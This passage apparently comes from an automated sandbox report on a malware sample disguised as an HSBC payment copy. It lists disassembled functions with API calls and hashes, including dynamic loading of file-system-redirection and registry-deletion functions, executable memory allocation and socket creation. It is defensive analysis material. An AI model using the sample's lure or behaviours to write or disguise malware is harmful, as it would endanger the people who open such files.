                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                • String ID: Listbox
                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                • Opcode ID: b7513aaa3e9e93418e2c874f2ceb88ff1192261b1b3e54a0cdf1e1c9573a386a
                                                                                                                                • Instruction ID: 823d84068781038cd95150401239d45f06fa2d42b32d67c9c66b43d26ceaeec7
                                                                                                                                • Opcode Fuzzy Hash: b7513aaa3e9e93418e2c874f2ceb88ff1192261b1b3e54a0cdf1e1c9573a386a
                                                                                                                                • Instruction Fuzzy Hash: 44219232711118BFDF118F54DC45EBB3BBAEFCA760F058224FA459B1A0C679AC519BA0
                                                                                                                                APIs
                                                                                                                                • __snwprintf.LIBCMT ref: 00793A66
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __snwprintf_memmove
                                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d$%{
                                                                                                                                • API String ID: 3506404897-390091804
                                                                                                                                • Opcode ID: 7e76c1c7c9813c71227eb0b7baf38c0136f1eeb3ed55af118b63ac909ae49947
                                                                                                                                • Instruction ID: e582dc5986933b95014ce259eaf724be8cba0874993b8a1f214cb24c37bb5578
                                                                                                                                • Opcode Fuzzy Hash: 7e76c1c7c9813c71227eb0b7baf38c0136f1eeb3ed55af118b63ac909ae49947
                                                                                                                                • Instruction Fuzzy Hash: D6218171600129EFCF14EF64DC85EAE77B9EF44300F408459F559A7281DB39EA45CB62
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007A7772
                                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007A7787
                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007A7794
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                • Opcode ID: 993d34495d47f29d623e8147cbbbedd44fe764b28e97cdbd7ae26ddd45c6dc25
                                                                                                                                • Instruction ID: 09811dfc60336af4e31e30a294a905ae16e68f878779101a9d0d29a0866f0767
                                                                                                                                • Opcode Fuzzy Hash: 993d34495d47f29d623e8147cbbbedd44fe764b28e97cdbd7ae26ddd45c6dc25
                                                                                                                                • Instruction Fuzzy Hash: 5D110672244208BFEF245F75CC45FEB77A9EFCAB54F114229FA41A60A0D676E811CB20
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __calloc_crt
                                                                                                                                • String ID: }$@B~
                                                                                                                                • API String ID: 3494438863-1696300617
                                                                                                                                • Opcode ID: 2d14652700d7e946f999e4a926121fd6df6c2938203614b4eb7b375b34e48a1b
                                                                                                                                • Instruction ID: eca0705d03ca31bb9d7c4a360ebe6b87370f05fa6e907f3a4a680385e7bd14aa
                                                                                                                                • Opcode Fuzzy Hash: 2d14652700d7e946f999e4a926121fd6df6c2938203614b4eb7b375b34e48a1b
                                                                                                                                • Instruction Fuzzy Hash: 3CF068F5605A198BF7649F54BC91B6627D9F706734B70442AE300CE290EB7C8C41C6DA
                                                                                                                                APIs
                                                                                                                                • __lock.LIBCMT ref: 00749B94
                                                                                                                                  • Part of subcall function 00749C0B: __mtinitlocknum.LIBCMT ref: 00749C1D
                                                                                                                                  • Part of subcall function 00749C0B: EnterCriticalSection.KERNEL32(00000000,?,00749A7C,0000000D), ref: 00749C36
                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00749BA4
                                                                                                                                  • Part of subcall function 00749100: ___addlocaleref.LIBCMT ref: 0074911C
                                                                                                                                  • Part of subcall function 00749100: ___removelocaleref.LIBCMT ref: 00749127
                                                                                                                                  • Part of subcall function 00749100: ___freetlocinfo.LIBCMT ref: 0074913B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                                • String ID: 8}$8}
                                                                                                                                • API String ID: 547918592-1526444488
                                                                                                                                • Opcode ID: 133b53c991ca17357dc965adb72e12632c9ce6b7ab5146e4fa4be1bfed77ff01
                                                                                                                                • Instruction ID: 2e9f0f6e6ffe692ae581df950854e3f94f9226c5f60e8d1b5a8d51e06ba9123f
                                                                                                                                • Opcode Fuzzy Hash: 133b53c991ca17357dc965adb72e12632c9ce6b7ab5146e4fa4be1bfed77ff01
                                                                                                                                • Instruction Fuzzy Hash: C8E08CF1983708FAEA92BBE4690BF1E2770AB00B21F20415BF155595C1CF7C2400C62B
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00724B83,?), ref: 00724C44
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00724C56
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                                • Opcode ID: 1a090bbe50735bb416a82acade521d006238f57430e08ad4df9eedaea3a89ee7
                                                                                                                                • Instruction ID: b596d3b5993d1e108fbbb640d82a6473dc06d10ef82f3ced14c32e321e299b06
                                                                                                                                • Opcode Fuzzy Hash: 1a090bbe50735bb416a82acade521d006238f57430e08ad4df9eedaea3a89ee7
                                                                                                                                • Instruction Fuzzy Hash: 88D0C7B0500B23CFC7209FB5E80821A72E6AF02341B20C83AE492E6260E678C8C0CA20
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00724BD0,?,00724DEF,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724C11
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00724C23
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                                • Opcode ID: 13687aeba9cafec2f18a1115bff97af6d96f5e06e4ed155d91714e6f9ed1bad7
                                                                                                                                • Instruction ID: 14cafdb498f403c6a9a448b80ac14be438ee883305dbc5053e976471d6eb281c
                                                                                                                                • Opcode Fuzzy Hash: 13687aeba9cafec2f18a1115bff97af6d96f5e06e4ed155d91714e6f9ed1bad7
                                                                                                                                • Instruction Fuzzy Hash: 61D01270511723CFD720AFB5ED48646B6E6EF4A352B11CC3AD486D6150E6B8D4C0C664
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,007A1039), ref: 007A0DF5
                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007A0E07
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                                • Opcode ID: 85931ddb89a5ef378a15bda1907c9f8f24f3846145c74960307f103b82515c90
                                                                                                                                • Instruction ID: 75766b6928d4264527ca2d0c4ec988dceb082b97f83e74286c150abd5cbf68db
                                                                                                                                • Opcode Fuzzy Hash: 85931ddb89a5ef378a15bda1907c9f8f24f3846145c74960307f103b82515c90
                                                                                                                                • Instruction Fuzzy Hash: 97D0C270440316CFC3206FB0D80824276E5AF52341F00CC7ED582C2290D6B8D4A0C644
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00798CF4,?,007AF910), ref: 007990EE
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00799100
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                                • Opcode ID: 916181810b8ad321dcb4d5ce654821d5e2f99a5c97a198ee25417fe020d11d5a
                                                                                                                                • Instruction ID: 04d179c2c9c3feaeb36933fccbf32f7f8c1583dc343790c80f73902d85d985f3
                                                                                                                                • Opcode Fuzzy Hash: 916181810b8ad321dcb4d5ce654821d5e2f99a5c97a198ee25417fe020d11d5a
                                                                                                                                • Instruction Fuzzy Hash: 38D0C270550717CFDB209F75D80820272F5AF02342B15CC3ED481C2150E678C480C650
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                                • Opcode ID: 0ad7af6990aa732a19755243038d9a3b3a5189f6d711996af3dfb574309c8a9f
                                                                                                                                • Instruction ID: 46ff38917f0eda972491a0b18513ba5f5cee962d2f3a56f643c26c4f40183384
                                                                                                                                • Opcode Fuzzy Hash: 0ad7af6990aa732a19755243038d9a3b3a5189f6d711996af3dfb574309c8a9f
                                                                                                                                • Instruction Fuzzy Hash: ACD017B1804119EACB409A90988C8BD737CAB19301FA80462F90BE2080E23E9B94EB21
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1f5c00832fcf44a9dc9afa6ab8f663f683bde5aa465eb5d883c4583b7ef3bb5c
                                                                                                                                • Instruction ID: eee69dac7ff18c6180029741d0976e1e3fa9106e8257c56e4654cbe877dfd9cf
                                                                                                                                • Opcode Fuzzy Hash: 1f5c00832fcf44a9dc9afa6ab8f663f683bde5aa465eb5d883c4583b7ef3bb5c
                                                                                                                                • Instruction Fuzzy Hash: 98C17E74A04216EFCF18CFA4C884EAEBBB5FF48754B158598E809EB251D734ED81DB90
                                                                                                                                APIs
                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0079E0BE
                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0079E101
                                                                                                                                  • Part of subcall function 0079D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0079D7C5
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0079E301
                                                                                                                                • _memmove.LIBCMT ref: 0079E314
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3659485706-0
                                                                                                                                • Opcode ID: 4a28319d73e34126e86e6a01376a1bc7d09c321afe7fb04a006680880aea783b
                                                                                                                                • Instruction ID: 170da52f3819815f889e1bfa8992ebcff78389b1d605886d308e9cdc534ed973
                                                                                                                                • Opcode Fuzzy Hash: 4a28319d73e34126e86e6a01376a1bc7d09c321afe7fb04a006680880aea783b
                                                                                                                                • Instruction Fuzzy Hash: AAC17971A08311DFCB04DF28D484A6ABBE4FF89714F04896EF9999B351D734E946CB82
                                                                                                                                APIs
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 007980C3
                                                                                                                                • CoUninitialize.OLE32 ref: 007980CE
                                                                                                                                  • Part of subcall function 0077D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077D5D4
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 007980D9
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 007983AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 780911581-0
                                                                                                                                • Opcode ID: 6b903381018578ef3abbadbcba6f1ecb079945868d0842ffe0a2f8e8ca17712d
                                                                                                                                • Instruction ID: 5a7490938cc3746c2256026d904ad674199aca83b318ec744a8bf8bc42a2fdbe
                                                                                                                                • Opcode Fuzzy Hash: 6b903381018578ef3abbadbcba6f1ecb079945868d0842ffe0a2f8e8ca17712d
                                                                                                                                • Instruction Fuzzy Hash: 01A15975604711DFCB40DF64D485A2AB7E4BF8A714F08844CFA969B3A1CB38EC44CB86
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2808897238-0
                                                                                                                                • Opcode ID: c1cbf54b496683df70cb58fef55538c032519c89d4a93e41ba0c2eccaf50a43c
                                                                                                                                • Instruction ID: c89ca8f1d24904b3d86e5c861641cc6d50cd71c906d8358bea92b77194657b04
                                                                                                                                • Opcode Fuzzy Hash: c1cbf54b496683df70cb58fef55538c032519c89d4a93e41ba0c2eccaf50a43c
                                                                                                                                • Instruction Fuzzy Hash: C951D374704B01DACF24AF65D895A3AB3E5AF45390F24C81FE68EDB295DB3CD8808B45
                                                                                                                                APIs
                                                                                                                                • GetWindowRect.USER32(0119ECA8,?), ref: 007A9863
                                                                                                                                • ScreenToClient.USER32(00000002,00000002), ref: 007A9896
                                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007A9903
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                • Opcode ID: c7aa05df7e8949ccfffc859657c95b1351e1fefab0425c5c659607efc0a21567
                                                                                                                                • Instruction ID: 6c6288ec21a773f7205fe80ed732870cf1a5171cd55b8504ad0081de067d0f90
                                                                                                                                • Opcode Fuzzy Hash: c7aa05df7e8949ccfffc859657c95b1351e1fefab0425c5c659607efc0a21567
                                                                                                                                • Instruction Fuzzy Hash: D5514034A00209EFCF10CF54C884AAE7BB5FF96360F148259F9559B2A0D738ED51CB90
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00779AD2
                                                                                                                                • __itow.LIBCMT ref: 00779B03
                                                                                                                                  • Part of subcall function 00779D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00779DBE
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00779B6C
                                                                                                                                • __itow.LIBCMT ref: 00779BC3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$__itow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3379773720-0
                                                                                                                                • Opcode ID: f9f3b9d6e25480ea2b948dbae3013541eed12d58636206cd3e7e4c8fd975ad19
                                                                                                                                • Instruction ID: d549ff660d9e3aaea7d6b332cf8fde3c6c1af0c5f29368aa7e2c45aa7596e185
                                                                                                                                • Opcode Fuzzy Hash: f9f3b9d6e25480ea2b948dbae3013541eed12d58636206cd3e7e4c8fd975ad19
                                                                                                                                • Instruction Fuzzy Hash: 2741B3B0A01218EBDF25DF54D849FFE7BB9EF45750F004069FA09A3291DB789944CBA1
                                                                                                                                APIs
                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 007969D1
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007969E1
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
